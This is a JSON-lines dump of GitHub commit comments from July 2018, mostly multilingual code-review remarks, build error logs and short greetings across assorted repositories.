{"id":"8001776991","type":"CommitCommentEvent","actor":{"login":"fasybu"},"repo":{"name":"fasybu/M.Jarvis"},"payload":{"comment":{"id":29795941,"position":1,"line":1,"path":"README.md","commit_id":"72e0bb27df26ddd366f24fee847af3b1e9e03ad8","created_at":"2018-07-23T05:31:56Z","updated_at":"2018-07-23T05:31:56Z","author_association":"OWNER","body":"my first project"}},"created_at":"2018-07-23T05:31:56Z"}
{"id":"8001780614","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29795944,"position":31,"line":165,"path":"src/base/net/downloadhandler.cpp","commit_id":"75eb76482827bdb55c3a429cb972703f8b2b519f","created_at":"2018-07-23T05:33:23Z","updated_at":"2018-07-23T05:33:23Z","author_association":"MEMBER","body":"Oops... I've just realised that. This condition is leftover from some older logic and it's redundant since we nothing to do with m_reply in this method."}},"created_at":"2018-07-23T05:33:23Z"}
{"id":"8001786492","type":"CommitCommentEvent","actor":{"login":"moezbhatti"},"repo":{"name":"moezbhatti/qksms"},"payload":{"comment":{"id":29795960,"position":null,"line":null,"path":null,"commit_id":"fbd7c7b3a10f629b3f485780754c735acf9ab64a","created_at":"2018-07-23T05:35:47Z","updated_at":"2018-07-23T05:35:47Z","author_association":"OWNER","body":"*summary 😢 "}},"created_at":"2018-07-23T05:35:47Z"}
{"id":"8001786806","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29795962,"position":null,"line":null,"path":null,"commit_id":"ce4221dc18e485d525530fc804043a86395e5834","created_at":"2018-07-23T05:35:56Z","updated_at":"2018-07-23T05:35:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bot Start-up](https://trello.com/c/NzsuAEiw/19-bot-start-up)"}},"created_at":"2018-07-23T05:35:56Z"}
{"id":"8001786913","type":"CommitCommentEvent","actor":{"login":"nakata-haruka"},"repo":{"name":"nakata-haruka/test"},"payload":{"comment":{"id":29795963,"position":null,"line":null,"path":null,"commit_id":"b9f95befb77bfc1d8773ac7b42a1d5f9420131e9","created_at":"2018-07-23T05:35:59Z","updated_at":"2018-07-23T05:35:59Z","author_association":"OWNER","body":"コダンプロンプト　⇒　×\r\nコマンドプロンプト⇒　○"}},"created_at":"2018-07-23T05:35:59Z"}
{"id":"8001790542","type":"CommitCommentEvent","actor":{"login":"nakata-haruka"},"repo":{"name":"nakata-haruka/test"},"payload":{"comment":{"id":29795971,"position":null,"line":null,"path":null,"commit_id":"b9f95befb77bfc1d8773ac7b42a1d5f9420131e9","created_at":"2018-07-23T05:37:27Z","updated_at":"2018-07-23T05:37:27Z","author_association":"OWNER","body":"コダンプロンプトと間違えているかと思ったら、グーグルクロームの英語翻訳によるものだった。\r\n翻訳無しだと、コマンドプロンプトという表記になってる"}},"created_at":"2018-07-23T05:37:27Z"}
{"id":"8001792201","type":"CommitCommentEvent","actor":{"login":"juancarloscruzd"},"repo":{"name":"thinkful-ei23/module-exercises-Rose"},"payload":{"comment":{"id":29795973,"position":119,"line":130,"path":"index.js","commit_id":"e5e6da0c76ddc67a56d6856b150f3d82924adf88","created_at":"2018-07-23T05:38:09Z","updated_at":"2018-07-23T05:38:09Z","author_association":"NONE","body":"Hey Rose, remember you can use a form and subscribe to the `submit` event, that covers the enter input and if you want, you can add a button to perform the search."}},"created_at":"2018-07-23T05:38:09Z"}
{"id":"8001797173","type":"CommitCommentEvent","actor":{"login":"juancarloscruzd"},"repo":{"name":"thinkful-ei23/module-exercises-Rose"},"payload":{"comment":{"id":29795982,"position":121,"line":132,"path":"index.js","commit_id":"e5e6da0c76ddc67a56d6856b150f3d82924adf88","created_at":"2018-07-23T05:40:04Z","updated_at":"2018-07-23T05:40:04Z","author_association":"NONE","body":"If you are not planning to change the value of the variable, you can use `const` instead."}},"created_at":"2018-07-23T05:40:04Z"}
{"id":"8001799887","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29795984,"position":3,"line":3,"path":"src/io/jiyuujin/java/day21/People.java","commit_id":"e4eca0b8c32b0903c2c7518e6b4553983092e615","created_at":"2018-07-23T05:41:06Z","updated_at":"2018-07-23T05:41:06Z","author_association":"COLLABORATOR","body":"もう1レベル上げましょうか\r\n\r\n// 起動クラスは別で作ると各クラス内が起動処理で汚れない\r\npublic class Boot {\r\n    public static void main(String[] args) {\r\n        // 処理フローはここを見たら一目瞭然\r\n        GamePlayers gamePlayers = new GamePlayers();\r\n        gamePlayers.printPeoples();\r\n    }\r\n}\r\n\r\n// アクセス修飾子無しはパッケージプライベート\r\nclass GamePlayers {\r\n    private int count = 3;\r\n    private Person[] persons = null;\r\n\r\n    // アクセス修飾子無しはパッケージプライベート\r\n    GamePlayers() {\r\n        // この場合固定値での初期化なので人の準備は初期処理でOK\r\n        preparePeoples();\r\n    }\r\n\r\n    // 人々の準備\r\n    private void preparePeoples() {\r\n        persons = new Person[count];\r\n\r\n        persons[0] = new Person(\"jiyuujin\");\r\n        persons[1] = new Person(\"caorol\");\r\n        persons[2] = new Person(\"webneko\");\r\n    }\r\n\r\n    // アクセス修飾子無しはパッケージプライベート\r\n    void printPeoples() {\r\n        for (int i = 0; i < count; i++) {\r\n            // クラスの方に文字列生成を任せる事で、\r\n            // そのクラスがどんなメンバ（属性）を持っているか関知しなくていい\r\n            // ・カプセル化\r\n            // ・凝集度\r\n            // ・疎結合\r\n            System.out.println(persons[i].toString());\r\n        }\r\n    }\r\n}\r\n\r\n// Peopleって複数だからPersonのがいい\r\n// Characters クラスを Enemy にリネームして、親クラスとして Character クラスを作成するのであれば\r\n// public class Person extends Character {\r\n// public class Enemy extends Character {\r\n// とかもできますね、その場合 Character クラスは abstruct で作成して実装/インターフェースの役割をもたせておくと\r\n// GamePlayers クラスからのアクセス時に Character クラスだけ把握しておけばいい事になります\r\npublic class Person {\r\n    private String name;\r\n    public Person(String name) {\r\n        this.name = name;\r\n    }\r\n\r\n    @Override\r\n    public String toString() {\r\n        // 自分のクラスのメンバなので文字列生成もここでやる方が変更入った時に修正範囲がクラス内だけになるでしょ\r\n        return \"People name: \" + this.name;\r\n    }\r\n}"}},"created_at":"2018-07-23T05:41:06Z"}
{"id":"8001803219","type":"CommitCommentEvent","actor":{"login":"juancarloscruzd"},"repo":{"name":"thinkful-ei23/module-exercises-Rose"},"payload":{"comment":{"id":29795989,"position":null,"line":null,"path":null,"commit_id":"e5e6da0c76ddc67a56d6856b150f3d82924adf88","created_at":"2018-07-23T05:42:25Z","updated_at":"2018-07-23T05:42:25Z","author_association":"NONE","body":"Rose, Great work!\r\nSee you tomorrow.\r\n"}},"created_at":"2018-07-23T05:42:25Z"}
{"id":"8001805117","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29795991,"position":71,"line":1770,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d41cc4f8d29e158f20fa2fcc6255bac7864d7b7","created_at":"2018-07-23T05:43:13Z","updated_at":"2018-07-23T05:43:13Z","author_association":"COLLABORATOR","body":"Is there a T missing here?"}},"created_at":"2018-07-23T05:43:13Z"}
{"id":"8001807143","type":"CommitCommentEvent","actor":{"login":"arunselva123"},"repo":{"name":"arunselva123/pythonp"},"payload":{"comment":{"id":29795996,"position":null,"line":null,"path":null,"commit_id":"a649d3a71af5f927f845a32d68867540f33fb314","created_at":"2018-07-23T05:43:57Z","updated_at":"2018-07-23T05:43:57Z","author_association":"OWNER","body":"def roman_numeral_to_int(string):\r\n    symbols = {\r\n        'I': 1,\r\n        'V': 5,\r\n        'X': 10,\r\n        'L': 50,\r\n        'C': 100,\r\n        'D': 500,\r\n        'M': 1000\r\n    }\r\n    repetitions = {}\r\n    result = 0\r\n    skip = 0\r\n    for i, c in enumerate(string):\r\n        if i == skip and i != 0:\r\n            continue\r\n        if c not in symbols:\r\n            return None\r\n        if c in repetitions.items():\r\n            repetitions[c] += 1\r\n        else:\r\n            repetitions = {c: 1}\r\n        for r, v in repetitions.items():\r\n            if (r in ['L', 'D', 'V'] and v > 1) or (r in ['I', 'X', 'C'] and v > 3):\r\n                return None\r\n        if c == 'I':\r\n            # last character in the string\r\n            if i == len(string) - 1:\r\n                result += 1\r\n            elif string[i+1] == 'V':\r\n              result += 4\r\n                skip = i + 1\r\n            elif string[i+1] == 'X':\r\n                result += 9\r\n                skip = i + 1\r\n        elif c == 'X':\r\n            # last character in the string\r\n            if i == len(string) - 1:\r\n                result += 10\r\n            elif string[i+1] == 'L':\r\n                result += 40\r\n                skip = i + 1\r\n            elif string[i+1] == 'C':\r\n                result += 90\r\n                skip = i + 1\r\n        elif c == 'C':\r\n            # last character in the string\r\n            if i == len(string) - 1:\r\n                result += 100\r\n            elif string[i+1] == 'D':\r\n                result += 400\r\n                skip = i + 1\r\n            elif string[i+1] == 'M':\r\n                result += 900\r\n                skip = i + 1\r\n        else:\r\n            skip = 0\r\n            result += symbols[c]\r\n    return result\r\n"}},"created_at":"2018-07-23T05:43:57Z"}
{"id":"8001808211","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29796001,"position":12,"line":12,"path":"M-1/01-ideal-weight.rb","commit_id":"eb3937e8c89927b8cdeb12e871ffa66fbe40b147","created_at":"2018-07-23T05:44:19Z","updated_at":"2018-07-23T05:44:19Z","author_association":"NONE","body":"`capitalize` лучше вызывать в момент инициализации переменной (в 2-ой строке)\r\n"}},"created_at":"2018-07-23T05:44:19Z"}
{"id":"8001810497","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29796008,"position":31,"line":165,"path":"src/base/net/downloadhandler.cpp","commit_id":"75eb76482827bdb55c3a429cb972703f8b2b519f","created_at":"2018-07-23T05:45:12Z","updated_at":"2018-07-23T05:45:12Z","author_association":"MEMBER","body":"OK, done."}},"created_at":"2018-07-23T05:45:12Z"}
{"id":"8001815386","type":"CommitCommentEvent","actor":{"login":"ramyashree581"},"repo":{"name":"ramyashree581/git_practice"},"payload":{"comment":{"id":29796013,"position":null,"line":null,"path":null,"commit_id":"aefced3d09fd725774a27ad1a7b404b171b0fe2a","created_at":"2018-07-23T05:47:01Z","updated_at":"2018-07-23T05:47:01Z","author_association":"OWNER","body":"Added New Line"}},"created_at":"2018-07-23T05:47:01Z"}
{"id":"8001817668","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29796019,"position":20,"line":20,"path":"M-1/03-right-triangle.rb","commit_id":"eb3937e8c89927b8cdeb12e871ffa66fbe40b147","created_at":"2018-07-23T05:47:55Z","updated_at":"2018-07-23T05:47:55Z","author_association":"NONE","body":"в ТЗ: \"Также, если треугольник является при этом равнобедренным\"\r\nобрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный\r\nэта проверка лишняя"}},"created_at":"2018-07-23T05:47:55Z"}
{"id":"8001819101","type":"CommitCommentEvent","actor":{"login":"rajdeepyadav"},"repo":{"name":"rajdeepyadav/Truckers"},"payload":{"comment":{"id":29796023,"position":null,"line":null,"path":null,"commit_id":"43b3a95ba8f14efc401422c221072f98d3d225ff","created_at":"2018-07-23T05:48:28Z","updated_at":"2018-07-23T05:48:28Z","author_association":"OWNER","body":"Forgot to include 1 file"}},"created_at":"2018-07-23T05:48:28Z"}
{"id":"8001820610","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29796026,"position":null,"line":null,"path":null,"commit_id":"ccfcb431d0089f84ef37603c0bd76f78be69c9dd","created_at":"2018-07-23T05:49:03Z","updated_at":"2018-07-23T05:49:03Z","author_association":"CONTRIBUTOR","body":"I got this error when i compile the Arcade build:\r\n\r\n\r\nLinking mamearcade.exe...\r\n../../../../mingw-gcc/bin/x32/Release/mame_arcade/liboptional.a(ps2gs.o):ps2gs.cpp:(.text+0x4de): undefined reference to `vtable for device_finder<ps2_intc_devi\r\nce, true>'\r\n../../../../mingw-gcc/bin/x32/Release/mame_arcade/liboptional.a(ps2gs.o):ps2gs.cpp:(.text$_ZN3emu6detail21device_type_impl_base13create_deviceI13ps2_gs_deviceEESt10unique_ptrI8device_tSt14default_deleteIS5_EERKS1_RK14machine_configPKcPS5_j[__ZN3emu6detail21device_type_impl_base13create_deviceI13ps2_gs_deviceEESt10unique_ptrI8device_tSt14default_deleteIS5_EERKS1_RK14machine_configPKcPS5_j]+0xb3): undefined reference to `vtable for device_finder<ps2_intc_device, true>'\r\ncollect2.exe: error: ld returned 1 exit status\r\nmamearcade.make:252: recipe for target '../../../../../mamearcade.exe' failed\r\nmake[2]: *** [../../../../../mamearcade.exe] Error 1\r\nmakefile:409: recipe for target 'mamearcade' failed\r\nmake[1]: *** [mamearcade] Error 2\r\nmakefile:1052: recipe for target 'windows_x86' failed\r\nmake: *** [windows_x86] Error 2"}},"created_at":"2018-07-23T05:49:03Z"}
{"id":"8001820918","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29796027,"position":13,"line":13,"path":"M-1/03-right-triangle.rb","commit_id":"eb3937e8c89927b8cdeb12e871ffa66fbe40b147","created_at":"2018-07-23T05:49:10Z","updated_at":"2018-07-23T05:49:10Z","author_association":"NONE","body":"не рекомендуется использовать вложенные условия (`if / else` блоки), там где можно без потерь обойтись без них\r\nчем более линеен код, тем он более читаем, чем код более читаем, тем выше считается его качество\r\n\r\nздесь несложно переписать код  без вложенных условий"}},"created_at":"2018-07-23T05:49:10Z"}
{"id":"8001821528","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29796028,"position":null,"line":null,"path":null,"commit_id":"def17aa26cb76252f48fedcced980ef68a09a957","created_at":"2018-07-23T05:49:24Z","updated_at":"2018-07-23T05:49:24Z","author_association":"CONTRIBUTOR","body":"<img width=\"935\" alt=\"2018-07-23 2 37 27\" src=\"https://user-images.githubusercontent.com/1390368/43059413-406dcb86-8e87-11e8-9171-72c168e1efb3.png\">\r\n\r\n현재는 historable.diff_removed_body 가 위키와 같은 모양으로 작동하는군요.\r\nhtml tag가 바뀐 것도 변화라고 봐야 하지 않을까요?"}},"created_at":"2018-07-23T05:49:24Z"}
{"id":"8001822143","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29796032,"position":19,"line":26,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-23T05:49:38Z","updated_at":"2018-07-23T05:49:38Z","author_association":"COLLABORATOR","body":"@MikhailSkirukha task sequence will be defined by `sequenceID` and `order` properties of `GameTask` entity. That's why I wanted this concept to be named `ExclusiveGroup` initially, because it is not ID actually, but only a number which is the same among all tasks within the same task group (task sequence). \r\n\r\nThat's right, this data will be provided on game creation step, but only as a property of task, not as separate object."}},"created_at":"2018-07-23T05:49:38Z"}
{"id":"8001822336","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796034,"position":4,"line":4,"path":"part2/quadratic_equation.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T05:49:43Z","updated_at":"2018-07-23T05:49:43Z","author_association":"NONE","body":"Что-б код выглядел менее императивным и читался по английский можно использовать встроенные методы руби. Например тут можно написать\r\n``` while input.empty? do ```"}},"created_at":"2018-07-23T05:49:43Z"}
{"id":"8001830023","type":"CommitCommentEvent","actor":{"login":"ARKOPROVO"},"repo":{"name":"ARKOPROVO/c"},"payload":{"comment":{"id":29796047,"position":11,"line":11,"path":"String","commit_id":"9f2c46066df87874c1d42fa9fea94162f7a96903","created_at":"2018-07-23T05:52:34Z","updated_at":"2018-07-23T05:52:34Z","author_association":"OWNER","body":"temp=(char*)malloc(50*sizeof(char));//will solve the issue...runtime error was occuring because array was not initiaized"}},"created_at":"2018-07-23T05:52:34Z"}
{"id":"8001830062","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29796048,"position":23,"line":30,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-23T05:52:35Z","updated_at":"2018-07-23T05:52:35Z","author_association":"COLLABORATOR","body":"@MikhailSkirukha I can't figure out the best way here right now. It's whether we set one coefficient for all tasks within game (which should be relative to task cost: percentage or smth.), or we can define this additional coefficient for each task (which will be more flexible, but do we really need this level of complexity? =)"}},"created_at":"2018-07-23T05:52:35Z"}
{"id":"8001830727","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29796049,"position":40,"line":45,"path":"src/io/jiyuujin/java/day4/PersonInfo.java","commit_id":"0000a0fd6daca30448ac6cb90a992361e47ab2ba","created_at":"2018-07-23T05:52:49Z","updated_at":"2018-07-23T05:52:49Z","author_association":"COLLABORATOR","body":"違う違う、\r\nコンストラクタは少ない方から多い方を呼び出すの\r\nそしたらパラメタの初期化も代入もコンストラクタでできるでしょ？\r\nカウントも一箇所で済むでしょ？\r\n```\r\n// 少ない方から多い方を呼び出して\r\nPersonInfo(String firstName, String lastName, int age, double height, double weight, String job) {\r\n    // middleNameの設定のないコンストラクタからあるコンストラクタを呼び出す際に初期値 \"\" を入れる\r\n    this(firstName, \"\",lastName, age, height, weight, job);\r\n}\r\n\r\n// 多い方で一括で代入、その他必要な処理を全部やる\r\nPersonInfo(String firstName, String middleName, String lastName, int age, double height, double weight, String job) {\r\n    // 代入\r\n    this.firstName = firstName;\r\n    …\r\n\r\n    // カウント\r\n    PersonInfo.count++;\r\n```"}},"created_at":"2018-07-23T05:52:49Z"}
{"id":"8001834735","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796056,"position":14,"line":14,"path":"part2/quadratic_equation.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T05:54:15Z","updated_at":"2018-07-23T05:54:15Z","author_association":"NONE","body":"Раз уже используешь методы, то в руби последняя строка выполненная методом и будет возвращена из него. Это позволяет использовать ключевое слово return только в случаях раннего возврата из метода. Так-что слово return можно убрать"}},"created_at":"2018-07-23T05:54:15Z"}
{"id":"8001838557","type":"CommitCommentEvent","actor":{"login":"studiox3"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29796065,"position":8,"line":124,"path":"classes/Rijndael.php","commit_id":"b07763d666b3d9231e60d622a5c656cbb56f9d52","created_at":"2018-07-23T05:55:37Z","updated_at":"2018-07-23T05:55:37Z","author_association":"NONE","body":"Use of undefined constant MCRYPT_RIJNDAEL_128 - assumed 'MCRYPT_RIJNDAEL_128' (this will throw an Error in a future version of PHP) in ../classes/Rijndael.php on line 124\r\n\r\nServer software version: nginx/1.14.0\r\nPHP versija 7.2.7\r\nMemory limit: 128M\r\nMax execution time: 30 \r\nMySQL version: 5.7.22 "}},"created_at":"2018-07-23T05:55:37Z"}
{"id":"8001838563","type":"CommitCommentEvent","actor":{"login":"vanumg"},"repo":{"name":"vanumg/spring-service"},"payload":{"comment":{"id":29796066,"position":3,"line":3,"path":"hello.html","commit_id":"0ec8e20a9fac092a1937481bbfa8021d2073bdd8","created_at":"2018-07-23T05:55:37Z","updated_at":"2018-07-23T05:55:37Z","author_association":"OWNER","body":"sdsd"}},"created_at":"2018-07-23T05:55:37Z"}
{"id":"8001839479","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29796068,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T05:55:58Z","updated_at":"2018-07-23T05:55:58Z","author_association":"NONE","body":"Wow!"}},"created_at":"2018-07-23T05:55:58Z"}
{"id":"8001839704","type":"CommitCommentEvent","actor":{"login":"filiphanes"},"repo":{"name":"filiphanes/live-controller"},"payload":{"comment":{"id":29796069,"position":4,"line":3,"path":"config.json.sample","commit_id":"73e25b0efd70357a53cd039325969454f9ecc765","created_at":"2018-07-23T05:56:04Z","updated_at":"2018-07-23T05:56:04Z","author_association":"OWNER","body":"default IP changed to default ATEM IP"}},"created_at":"2018-07-23T05:56:04Z"}
{"id":"8001840784","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29796072,"position":80,"line":74,"path":"src/io/jiyuujin/java/day4/PersonInfo.java","commit_id":"0000a0fd6daca30448ac6cb90a992361e47ab2ba","created_at":"2018-07-23T05:56:27Z","updated_at":"2018-07-23T05:56:27Z","author_association":"COLLABORATOR","body":"こうも書けるよ\r\n```\r\nString middleName = this.middleName!=\"\"?this.middleName + \" \": \"\";\r\nreturn this.firstName + \" \" + middleName + this.lastName;\r\n```"}},"created_at":"2018-07-23T05:56:27Z"}
{"id":"8001841832","type":"CommitCommentEvent","actor":{"login":"JDKCHINA"},"repo":{"name":"paldier/K3C-merlin"},"payload":{"comment":{"id":29796076,"position":null,"line":null,"path":null,"commit_id":"3560753f6d5735ee4d70787fed8e3b1353bb509b","created_at":"2018-07-23T05:56:50Z","updated_at":"2018-07-23T05:56:50Z","author_association":"NONE","body":"大大，你刷进入用的如何？有啥问题？"}},"created_at":"2018-07-23T05:56:50Z"}
{"id":"8001844516","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29796078,"position":null,"line":null,"path":null,"commit_id":"0b19dfd3c62937f82f5bd52f57f198300a12052c","created_at":"2018-07-23T05:57:47Z","updated_at":"2018-07-23T05:57:47Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-23T05:57:47Z"}
{"id":"8001844958","type":"CommitCommentEvent","actor":{"login":"Younus8700"},"repo":{"name":"tedc/ferretti-deploy-def"},"payload":{"comment":{"id":29796080,"position":null,"line":null,"path":null,"commit_id":"9167f63f26cc6119dd07abe2cf9e733f30608fe4","created_at":"2018-07-23T05:57:51Z","updated_at":"2018-07-23T05:57:51Z","author_association":"NONE","body":"Hello"}},"created_at":"2018-07-23T05:57:51Z"}
{"id":"8001847116","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796082,"position":36,"line":36,"path":"part2/quadratic_equation.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T05:58:26Z","updated_at":"2018-07-23T05:58:26Z","author_association":"NONE","body":"Можно вынести вычисление квадратного корня в отдельную переменную. Тогда он будет подсчитан 1 раз, а затем переиспользован. На данном этапе это \"грошовая оптимизация\", но в случаях более сложных вычислений, такой прием сэкономит много ресурсов"}},"created_at":"2018-07-23T05:58:26Z"}
{"id":"8001847199","type":"CommitCommentEvent","actor":{"login":"Younus8700"},"repo":{"name":"nixxo/umsp-plugins"},"payload":{"comment":{"id":29796083,"position":null,"line":null,"path":null,"commit_id":"d691abe1da2e69a9031428dc621c4d7a66b78431","created_at":"2018-07-23T05:58:27Z","updated_at":"2018-07-23T05:58:27Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-23T05:58:27Z"}
{"id":"8001847785","type":"CommitCommentEvent","actor":{"login":"GaelleMG"},"repo":{"name":"GaelleMG/ImageJ_Macros"},"payload":{"comment":{"id":29796085,"position":null,"line":null,"path":null,"commit_id":"0fba13daa92ce66434959d7d08fd6b9160fb22c1","created_at":"2018-07-23T05:58:36Z","updated_at":"2018-07-23T05:58:36Z","author_association":"OWNER","body":"_setBatchMode(true) is a lifesaver_ as it makes IJ macros run up to **20x faster**!  JACoP analysis still takes about the same amount of time though.  Major breakthrough.  Now the computer is still usable during analysis since images won't open every few seconds."}},"created_at":"2018-07-23T05:58:36Z"}
{"id":"8001848687","type":"CommitCommentEvent","actor":{"login":"Younus8700"},"repo":{"name":"google-map-react/google-map-react"},"payload":{"comment":{"id":29796087,"position":null,"line":null,"path":null,"commit_id":"94db30bc381bf0fcacfc04a4187bd17b118d5b12","created_at":"2018-07-23T05:58:56Z","updated_at":"2018-07-23T05:58:56Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-23T05:58:56Z"}
{"id":"8001849650","type":"CommitCommentEvent","actor":{"login":"paprat"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29796089,"position":33,"line":33,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-23T05:59:13Z","updated_at":"2018-07-23T05:59:13Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-23T05:59:13Z"}
{"id":"8001850492","type":"CommitCommentEvent","actor":{"login":"paprat"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29796091,"position":38,"line":38,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-23T05:59:26Z","updated_at":"2018-07-23T05:59:26Z","author_association":"OWNER","body":"Using set instead of vector now."}},"created_at":"2018-07-23T05:59:26Z"}
{"id":"8001851198","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29796093,"position":2,"line":2,"path":"M-1/04_quadratic_equation.rb","commit_id":"eb3937e8c89927b8cdeb12e871ffa66fbe40b147","created_at":"2018-07-23T05:59:40Z","updated_at":"2018-07-23T05:59:40Z","author_association":"NONE","body":"особой нужды использовать `STDIN.gets` нет, можно было просто `gets`"}},"created_at":"2018-07-23T05:59:40Z"}
{"id":"8001851908","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796096,"position":15,"line":15,"path":"part2/quadratic_equation.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T05:59:56Z","updated_at":"2018-07-23T05:59:56Z","author_association":"NONE","body":"И не стоит оставлять пустую строку перед ретерном."}},"created_at":"2018-07-23T05:59:56Z"}
{"id":"8001854129","type":"CommitCommentEvent","actor":{"login":"paprat"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29796108,"position":58,"line":58,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-23T06:00:36Z","updated_at":"2018-07-23T06:00:36Z","author_association":"OWNER","body":"end() is past-the-element iterator. So, this means element doesn't exist in the container."}},"created_at":"2018-07-23T06:00:36Z"}
{"id":"8001854638","type":"CommitCommentEvent","actor":{"login":"paprat"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29796110,"position":69,"line":69,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-23T06:00:46Z","updated_at":"2018-07-23T06:00:46Z","author_association":"OWNER","body":"Using set now."}},"created_at":"2018-07-23T06:00:46Z"}
{"id":"8001868825","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29796125,"position":25,"line":32,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-23T06:05:10Z","updated_at":"2018-07-23T06:05:10Z","author_association":"COLLABORATOR","body":"@MikhailSkirukha \r\n\r\n> Wat? And if Maxim wishes to change the default value then he will ask us to make changes in our front-end code??? How can any data be stored not in DB?\r\n\r\nYou didn't get it. Front-end component can have property which is responsible for default cost. It is set on game creation and will not be stored anywhere but in this component. Any time when we add a new quest (during game creation), this new object will be inflated with this default cost value. It's like this:\r\n\r\n1. You want to add 10 quests with same cost, for example, 1000 ROG (`rogle`, local game currency)\r\n2. You set default value to 1000\r\n3. You add 10 tasks to game, whose cost will be set to 1000 on creation\r\n4. You want to add another 10 tasks with inital cost of 2000\r\n5. You set default value to 2000 (already existed quests are not affected by this change, their cost is still 1000)\r\n6. You add another 10 tasks to game, whose cost will be set to 2000 on creation\r\n\r\nWhen we finish game creation, this value is lost. We don't need it anywhere.\r\nIf someone decides to change cost value for all tasks in game, well... fuck em'. You'll have to change this value for every `GameTask` object in game.\r\n\r\nTask `cost` should be a property of `GameTask` object (that's why it was created), not an alternating value between a Game property. It's single source of truth approach)"}},"created_at":"2018-07-23T06:05:10Z"}
{"id":"8001869898","type":"CommitCommentEvent","actor":{"login":"mike-north"},"repo":{"name":"mike-north/ember.js"},"payload":{"comment":{"id":29796126,"position":27,"line":67,"path":"packages/ember-application/lib/system/engine-instance.js","commit_id":"e087ae693f690e9476156ce68ec09610edcb10b7","created_at":"2018-07-23T06:05:28Z","updated_at":"2018-07-23T06:05:28Z","author_association":"OWNER","body":"@dgeb I know you wrote this a long time ago, but can you recall what you meant by this return type? Is this a `Promise<[EngineInstance, Error]>` a `Promise<EngineInstance | Error>` or a `Promise<EngineInstance>` that might reject if an error occurs?"}},"created_at":"2018-07-23T06:05:28Z"}
